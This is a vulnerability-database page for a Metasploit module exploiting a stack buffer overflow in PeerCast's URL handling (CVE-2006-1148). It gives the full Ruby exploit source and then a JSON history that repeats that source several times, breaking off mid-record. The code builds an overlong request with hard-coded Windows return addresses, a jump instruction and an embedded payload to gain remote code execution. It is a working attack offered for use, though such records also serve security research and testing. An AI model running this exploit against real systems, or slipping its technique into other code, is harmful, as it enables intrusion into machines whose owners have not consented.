Search...

PeerCast URL Handling Buffer Overflow

2006-03-30T21:05:42

ID MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule &lt; Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           =&gt; 'PeerCast URL Handling Buffer Overflow',
      'Description'    =&gt; %q{
          This module exploits a stack buffer overflow in PeerCast &lt;= v0.1216.
        The vulnerability is caused due to a boundary error within the
        handling of URL parameters.
      },
      'Author'         =&gt; [ 'hdm' ],
      'License'        =&gt; MSF_LICENSE,
      'References'     =&gt;
        [
          ['CVE', '2006-1148'],
          ['OSVDB', '23777'],
          ['BID', '17040']
        ],
      'Privileged'     =&gt; false,
      'Payload'        =&gt;
        {
          'Space'    =&gt; 400,
          'BadChars' =&gt; "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
          'StackAdjustment' =&gt; -3500,
        },
      'Platform'       =&gt; 'win',
      'Targets'        =&gt;
        [
          ['Windows 2000 English SP0-SP4', { 'Ret' =&gt; 0x75023360 }],
          ['Windows 2003 English SP0-SP1', { 'Ret' =&gt; 0x77d099e3 }],
          ['Windows XP English SP0/SP1',   { 'Ret' =&gt; 0x77dbfa2c }],
          ['Windows XP English SP0/SP2',   { 'Ret' =&gt; 0x77dc12b8 }],
        ],
      'DisclosureDate' =&gt; 'Mar 8 2006'))

    register_options( [ Opt::RPORT(7144) ])
  end

  def exploit
    connect

    pat = rand_text_alphanumeric(1024)
    pat[768, 4] = [target.ret].pack('V')
    pat[812, 5] = [0xe9, -517].pack('CV')
    pat[300, payload.encoded.length] = payload.encoded

    uri = '/stream/?' + pat

    res = "GET #{uri} HTTP/1.0\r\n\r\n"

    print_status("Trying target address 0x%.8x..." % target.ret)
    sock.put(res)
    sock.close

    handler
    disconnect
  end
end

JSON Vulners Source

Initial Source

{"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-02-23T07:16:07", "history": [{"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-05-03T20:42:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/http/peercast_url", "reporter": "Rapid7", "references": ["#", "http://www.securityfocus.com/bid/17040", "http://cvedetails.com/cve/cve-2006-1148"], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-07-02T23:17:17", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\n\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-07-02T23:17:17", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/http/peercast_url", "reporter": "Rapid7", "references": ["#", "http://www.securityfocus.com/bid/17040", "http://cvedetails.com/cve/cve-2006-1148"], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-07-24T19:42:55", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-07-24T19:42:55", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-08-21T15:31:45", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-08-21T15:31:45", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-11-02T09:42:18", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-11-02T09:42:18", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-11-02T13:39:34", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2017-11-02T13:39:34"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-11-02T13:39:34", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-12-30T04:06:55", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2017-12-30T04:06:55"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-12-30T04:06:55", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-12-30T15:59:53", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2017-12-30T15:59:53"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-12-30T15:59:53", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-09T22:05:33", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2018-01-09T22:05:33"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-09T22:05:33", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-10T00:02:03", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2018-01-10T00:02:03"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-10T00:02:03", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-14T22:10:23", "history": [], "viewCount": 1, "enchantments": {"score": {"value": null, "modified": "2018-01-14T22:10:23"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": 